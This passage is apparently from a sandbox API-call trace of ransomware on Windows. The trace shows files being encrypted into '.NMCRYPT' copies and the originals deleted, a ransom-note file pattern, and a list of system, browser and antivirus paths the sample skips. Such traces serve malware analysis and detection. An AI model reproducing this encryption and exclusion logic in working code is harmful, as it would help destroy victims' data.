hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.217] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.218] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0146.218] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0146.219] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0146.219] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.219] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad778) returned 1 [0146.219] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0146.219] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0146.219] wcslen (_String="\\\\?\\") returned 0x4 [0146.219] CryptDuplicateKey (in: hKey=0x9ad778, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad678) returned 1 [0146.219] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0146.219] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0146.219] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2514) returned 1 [0146.219] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0146.220] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.221] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.221] GetLastError () returned 0x0 [0146.221] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.336] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.337] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.337] GetLastError () returned 0x0 [0146.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.337] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.337] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.337] GetLastError () returned 0x0 [0146.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.337] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.337] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.337] GetLastError () returned 0x0 [0146.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.337] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.337] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.337] GetLastError () returned 0x0 [0146.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.337] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.337] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.337] GetLastError () returned 0x0 [0146.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.337] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.337] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.337] GetLastError () returned 0x0 [0146.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.337] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.338] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.338] GetLastError () returned 0x0 [0146.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.338] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.338] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.338] GetLastError () returned 0x0 [0146.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.338] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0xd2, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0xd2, lpOverlapped=0x0) returned 1 [0146.338] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xd2, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xe0) returned 1 [0146.338] GetLastError () returned 0x0 [0146.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xe0, lpOverlapped=0x0) returned 1 [0146.338] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0146.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0146.338] CloseHandle (hObject=0x1624) returned 1 [0146.338] CloseHandle (hObject=0x588) returned 1 [0146.339] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml")) returned 0x20 [0146.339] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml", dwFileAttributes=0x20) returned 0 [0146.339] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml") returned 1 [0146.339] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml")) returned 0 [0146.339] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" [0146.339] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0146.339] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAE83.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxae83.tmp")) returned 0xae83 [0146.340] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAE83.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxae83.tmp"), dwFlags=0x1) returned 0 [0146.340] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAE83.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxae83.tmp")) returned 1 [0146.340] CryptDestroyKey (hKey=0x9ad678) returned 1 [0146.340] wcslen (_String="OK") returned 0x2 [0146.340] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0146.340] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0146.340] CryptDestroyKey (hKey=0x9ad778) returned 1 [0146.340] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0146.340] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0146.341] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*NMCRYPT") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*Recovers your files.html") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*.exe") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*.dll") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*.lnk") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*.bat") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*.ini") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*.msi") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*.scf") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*pagefile.sys*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*NTUSER.DAT*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*AppData*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*\\winrar\\*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*\\java\\*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*\\windows\\*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*\\ESET\\*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*\\AVG\\*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*\\AVIRA\\*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*Atheros*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*Realtek*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*bootmgr*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*boot*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*boot*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*CONFIG.SYS*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*IO.SYS*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*MSDOS.SYS*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*NTDETECT.COM*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*ntldr*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*chrome*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*opera*") returned 0 [0146.341] PathMatchSpecW (pszFile="ipsdeu.xml", pszSpec="*firefox*") returned 0 [0146.341] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml", pszSpec="*") returned 1 [0146.341] strlen (_Str="NMoreira") returned 0x8 [0146.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 